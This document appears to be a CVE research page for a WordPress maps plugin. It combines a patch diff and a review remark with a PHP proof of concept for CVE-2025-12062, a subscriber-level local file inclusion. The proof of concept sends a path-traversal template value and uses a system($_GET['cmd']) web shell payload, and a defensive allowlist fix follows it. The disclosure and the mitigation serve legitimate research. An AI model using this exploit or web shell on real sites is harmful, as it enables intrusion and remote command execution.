-	                         <div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/email_campaign_Flatline.png"></div>
-
-
-                        </div>';
-
-
-						break;
-
-
-					case 'links-block':
-						$links_html = '';
-						$links = $this->PO['links']['link'];
-						if (!empty($links)) {
-							$links_html = '<ul>';
-
-							// Loop through the links array to generate list items
-							foreach ($links as $link) {
-								$links_html .= '<li><a target="_blank" href="' . esc_url($link['url']) . '">' . esc_html($link['label']) . '</a></li>';
-							}
-
-							$links_html .= '</ul>';
-						}
-						$this->blockHeading = '<h1>' . $this->PO['links']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7">
-								<p>' . $this->PO['links']['desc'] . '</p>
-								'.$links_html.'
-							</div>
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/money_transfer_Flatline.png">
-
-
-							</div>
-						</div>';
-
-
-						break;
-
-
-					case 'extended-support':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['support']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-
-
-								<p>' . $this->PO['support']['desc1'] . '</p>
-
-
-								<br><br>
-
-
-								<a target="_blank" href="' . esc_url( $this->productSaleURL ) . '" name="one_year_support" id="one_year_support" value="" class="fc-btn fc-btn-default support">' . $this->PO['support']['link']['label'] . '</a>
-
-							</div>
-
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/coding_Flatline.png">
-
-
-
-							</div>
-
-
-
-						</div>';
-
-
-						break;
-
-
-					case 'create_support_ticket':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['create_support_ticket']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-								<p>' . $this->PO['create_support_ticket']['desc1'] . '</p>
-								<br><br>
-								<a target="_blank" class="fc-btn fc-btn-default" href="' . $this->PO['create_support_ticket']['link']['url'] . '">' . $this->PO['create_support_ticket']['link']['label'] . '</a>
-							</div>
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/it_Support_Flatline.png">
-
-
-							</div>
-
-
-						</div>';
-
-
-						break;
-
-
-					case 'hire_wp_expert':
-
-
-						$this->blockHeading = '<h1>' . $this->PO['hire_wp_expert']['heading'] . '</h1>';
-
-
-						$this->blockContent = '<div class="fc-divider fcdoc-brow fc-row">
-
-
-							<div class="fc-7 fc-items-center">
-
-
-								<p><strong>' . $this->PO['hire_wp_expert']['desc'] . '</strong></p>
-
-
-								<p>' . $this->PO['hire_wp_expert']['desc1'] . '</p>
-
-
-								<a target="_blank" class="fc-btn fc-btn-default refundbtn" href="'. $this->PO['hire_wp_expert']['link']['url'] .'">' . $this->PO['hire_wp_expert']['link']['label'] . '</a>
-
-
-							</div>
-
-
-							<div class="fc-5 fc-items-center fc-text-center"><img src="'. plugin_dir_url( __DIR__ ).'assets/images/web_Developer_Flatline.png">
-
-
-							</div>
-
-
-						</div>';
-
-
-						break;
-
-
-				}
-
-
-				$info = array( $this->blockHeading, $this->blockContent, $block );
-
-
-				$this->commonBlockMarkup .= $this->get_block_markup( $info );
-
-
-			}
-
-
-
-		}
-
-
-
-		function get_block_markup( $blockinfo ) {
-
-
-			$markup = '<div class="fc-6 fcdoc-blocks ' . $blockinfo[2] . '">
-
-
-			                <div class="fcdoc-block-content">
-
-
-			                    <div class="fcdoc-header">' . $blockinfo[0] . '</div>
-
-
-			                    <div class="fcdoc-body">' . $blockinfo[1] . '</div>
-
-
-
-			                </div>
-
-
-
-            		   </div>';
-
-
-			$this->productBlocksRendered++;
-
-
-			if ( $this->productBlocksRendered % 2 == 0 ) {
-
-
-				$markup .= '</div></div><div class="fc-divider"><div class="fcdoc-flexrow fc-row">';
-
-
-
-			}
-
-
-			return $markup;
-
-
-		}
-
-
-
-		function renderBlocks() {
-
-
-			$this->finalproductOverviewMarkup = $this->commonBlockMarkup . $this->pluginSpecificBlockMarkup;
-
-
-			echo $this->finalproductOverviewMarkup;
-
-
-		}
-
-
-
-	}
-
-
-
-
-}
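Review bot: The deleted class printed most of its $this->PO values, $pluginInfo['productName'] and the result of apply_filters('fc_plugin_nav_menu','') without escaping, and setup_plugin_info() assigned every key of $pluginInfo as an object property, so removing it is a net reduction in unescaped admin output. The matching removal of 'class.plugin-overview.php' from the core load list is in class.initiate-core.php; what remains to verify is that no page callback still instantiates Flippercode_Product_Overview.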
--- a/wp-google-map-plugin/core/class.tabular.php
+++ b/wp-google-map-plugin/core/class.tabular.php
@@ -1,4 +1,5 @@
 <?php
+/* phpcs:disable WordPress.WP.AlternativeFunctions */
 /**
  * FlipperCode_List_Table_Helper Class File.
  *
@@ -225,11 +226,13 @@


 			if( (is_admin())  &&  !empty($current_screen->id)){
-				$this->columns =  apply_filters('fc_tabular_'.$current_screen->id.'_columns',$this->columns);
+				$this->columns =  apply_filters('fc_tabular_'.$current_screen->id.'_columns',$this->columns); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
+
 			}

 			if( (is_admin())  &&  !empty($curre

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12062 - WP Maps <= 4.8.6 - Authenticated (Subscriber+) Limited Local File Inclusion

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
$evil_file = '../../../uploads/malicious.html';

// Create malicious .html file with PHP code
$php_code = '<?php echo "VULNERABLE"; system($_GET["cmd"]); ?>';

// Step 1: Authenticate to WordPress
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Exploit LFI via fc_load_template
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'fc_ajax_call',
        'template' => $evil_file,
        'call' => 'load_template'
    ]),
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true
]);

$result = curl_exec($ch);
curl_close($ch);

// Step 3: Check for successful exploitation
if (strpos($result, 'VULNERABLE') !== false) {
    echo "[+] Exploit successful! Target is vulnerable.\n";
    echo "[+] PHP code executed: $result\n";
} else {
    echo "[-] Exploit failed or target not vulnerable.\n";
    echo "Response: $result\n";
}

unlink($cookie_file);

?>
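The server-side check that rejects the `template` value sent by the PoC above, as an added example that is not the plugin's patched code: an allowlist lookup followed by `basename`/`realpath` containment. The function name `resolve_template`, the template names and the fixture directories are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. Function name, template names and
// directory layout are hypothetical.

function resolve_template(string $requested, string $base_dir, array $allowed): ?string
{
    // 1. Allowlist: only exact, predefined names pass; anything with path
    //    characters fails here because no allowed name contains them.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise the template directory once.
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // 3. Defence in depth: drop any directory component, then resolve symlinks.
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($requested) . '.html');
    if ($path === false) {
        return null; // allowed name, but no such file on disk
    }
    // 4. Containment: the resolved file must still live under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed fixture: a template directory with one legitimate template and
// a sibling "uploads" directory holding a file that must never be included.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . bin2hex(random_bytes(4));
mkdir("$root/templates", 0700, true);
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/templates/map-info.html", '<div>ok</div>');
file_put_contents("$root/uploads/malicious.html", 'untrusted content');

$allowed = ['map-info', 'map-settings'];
$cases = ['map-info', 'map-settings', '../../../uploads/malicious.html', '../uploads/malicious'];
foreach ($cases as $t) {
    $r = resolve_template($t, "$root/templates", $allowed);
    printf("%-34s => %s\n", $t, $r === null ? 'rejected' : 'allowed: ' . basename($r));
}

// Remove the fixture.
array_map('unlink', glob("$root/*/*.html"));
rmdir("$root/templates"); rmdir("$root/uploads"); rmdir($root);
```

A caller passes the returned path to `include` only when it is non-null, so the request value itself never reaches the filesystem call.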
